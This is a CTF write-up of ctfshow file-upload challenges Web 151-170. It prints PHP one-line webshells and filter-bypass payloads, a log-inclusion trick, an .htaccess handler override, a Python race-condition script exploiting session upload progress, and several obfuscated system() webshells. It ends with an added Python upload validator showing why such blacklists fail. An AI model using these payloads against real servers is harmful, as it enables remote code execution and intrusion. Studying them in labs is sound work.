Web 151
The validation is front-end only; capture the request and modify the data.
Web 152
Upload a one-line Trojan directly and connect to it.
Web 153
Reference link: File upload vulnerability: application of the .htaccess and .user.ini configuration files
Because this environment runs on nginx, .htaccess cannot be used.
Web 154
The file content cannot contain "php"; this can be bypassed by double writing.
Web 155
Use PHP short tags.
Web 156
[ ] is filtered; use { } instead:
<? eval($_POST{ctfshow});?>
Web 157
On top of the previous filters, ; and {} are now filtered as well.
Combine this with command execution to build an image Trojan:
<?=(system('nl ../f*.p*'))?>
Then just view the source code of the page.
Web 158
Same as the previous level, you can try different codes in combination with command execution.
Web 159
Some command execution functions may have been filtered; wrap the command in backticks instead:
<?=`nl ../f*.p*`?>
Web 160
Writing up the next question as I do it.
First upload .user.ini:
Then upload ctf.png with the Trojan and give it a try. Using the previous method, I found that spaces are filtered. I used some methods to bypass the space filter and got an error:
Since this is file inclusion, try log inclusion:
I included the log file directly and found that it doesn't work. I checked the masters' methods and learned something.
<?=include"/var/lo"."g/nginx/access.lo"."g"?>
Then add a one-line Trojan to the User-Agent header and connect with AntSword:
Web 161
These questions are a headache: there are no hints, I don't know what each question is testing, and they are all file uploads.
I referred to the masters' methods and reproduced them...
This level probably checks the uploaded image.
1. Add an image header: GIF89a
2. Make an image Trojan:
copy 1.png/b + shell.php/a ctf.png
This method was unsuccessful...
Web 162-163
File inclusion combined with a race condition
Reference: Use session.upload_progress for file inclusion and deserialization penetration
1. Upload the configuration file: I don't know what the problem is, but it fails when I include the file name, so I upload the png directly.
2. Upload png:
Thanks to Master Yu's blog, please refer to the script:
import requests
import threading

session = requests.session()
sess = 'ctfshow'
url1 = "http://ea6568d6-7c9e-4f10-9952-df2c188f01d5.chall.ctf.show/"
url2 = "http://ea6568d6-7c9e-4f10-9952-df2c188f01d5.chall.ctf.show/upload"
data1 = {
    'PHP_SESSION_UPLOAD_PROGRESS': '<?php system("tac ../f*");?>'
}
file = {
    'file': 'ctfshow'
}
cookies = {
    'PHPSESSID': sess
}


def write():
    while True:
        session.post(url1, data=data1, files=file, cookies=cookies)


def read():
    while True:
        r = session.get(url2)
        if 'flag' in r.text:
            print(r.text)


threads = [threading.Thread(target=write),
           threading.Thread(target=read)]
for t in threads:
    t.start()
Web 164
Secondary rendering in png format, not very good...
Reference link: Secondary rendering
Web 165
jpg picture secondary rendering. GG
Web 166
Following the masters' blogs: only zip files can be uploaded, so upload a zip:
1. Upload the zip file, which contains a Trojan:
2. Access the zip file's address:
I changed the request to POST and passed the parameter, then... it reported an error and that was the end.
Web 167
Extraordinarily conspicuous title...
Upload the .htaccess file:
SetHandler application/x-httpd-php
Upload a jpg file containing a one-line Trojan to get a shell.
Web 168-170
The title description is "Free Kill". I don't know much about this, so please refer to Master Yu's blog:
<?php
$a = "s#y#s#t#e#m";
$b = explode("#",$a);
$c = $b[0].$b[1].$b[2].$b[3].$b[4].$b[5];
$c($_REQUEST[1]);
?>
<?php
$a=substr('1s',1).'ystem';
$a($_REQUEST[1]);
?>
<?php
$a=strrev('metsys');
$a($_REQUEST[1]);
?>
<?php
$a=$_REQUEST['a'];
$b=$_REQUEST['b'];
$a($b);
?>
But I don’t know how to use it...
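As an added example (not from the original write-up or the challenge's code), here is a server-side upload check in Python that shows why a keyword blacklist like the one in Web 154-159 lets the payloads quoted above through, and what a stricter check rejects, including the .user.ini and .htaccess uploads from Web 153, 160 and 167. The names naive_filter and check_upload, the allow-list and the sample inputs are assumptions constructed for illustration.

```python
import os
import re
import secrets

ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif"}
# Per-directory config files the write-up uploads (Web 153, 160, 167).
CONFIG_NAMES = {".htaccess", ".user.ini"}
# Any PHP open tag: <?php, <?= and the bare short tag <? (Web 155-159).
PHP_OPEN_TAG = re.compile(rb"<\?(?!xml)", re.IGNORECASE)


def naive_filter(data: bytes) -> bool:
    """Assumed stand-in for a keyword blacklist: only blocks the word 'php'."""
    return b"php" not in data.lower()


def check_upload(filename: str, data: bytes):
    """Return (accepted, reason, stored_name); stored_name is server-generated."""
    base = os.path.basename(filename.replace("\\", "/")).strip().lower()
    if base in CONFIG_NAMES or base.startswith("."):
        return False, "config/dotfile name", None
    ext = os.path.splitext(base)[1]
    if ext not in ALLOWED_EXT:
        return False, "extension not allow-listed", None
    if PHP_OPEN_TAG.search(data):
        # A GIF89a prefix does not make the rest of the file inert (Web 161).
        return False, "PHP open tag in content", None
    # Never reuse the client-supplied name on disk.
    return True, "ok", secrets.token_hex(16) + ext


# Constructed samples; the PHP bodies are the payloads quoted in this write-up.
SAMPLES = [
    (".user.ini", b"; constructed placeholder body"),
    ("ctf.png", b"<?=`nl ../f*.p*`?>"),
    ("ctf.png", b"GIF89a<?=(system('nl ../f*.p*'))?>"),
    ("photo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
]

if __name__ == "__main__":
    for name, body in SAMPLES:
        accepted, reason, _ = check_upload(name, body)
        print(f"{name!r}: naive={naive_filter(body)} strict={accepted} ({reason})")
```

The tag scan can reject a legitimate image that happens to contain the bytes <?, and it is no substitute for storing uploads where the server never hands them to the PHP interpreter.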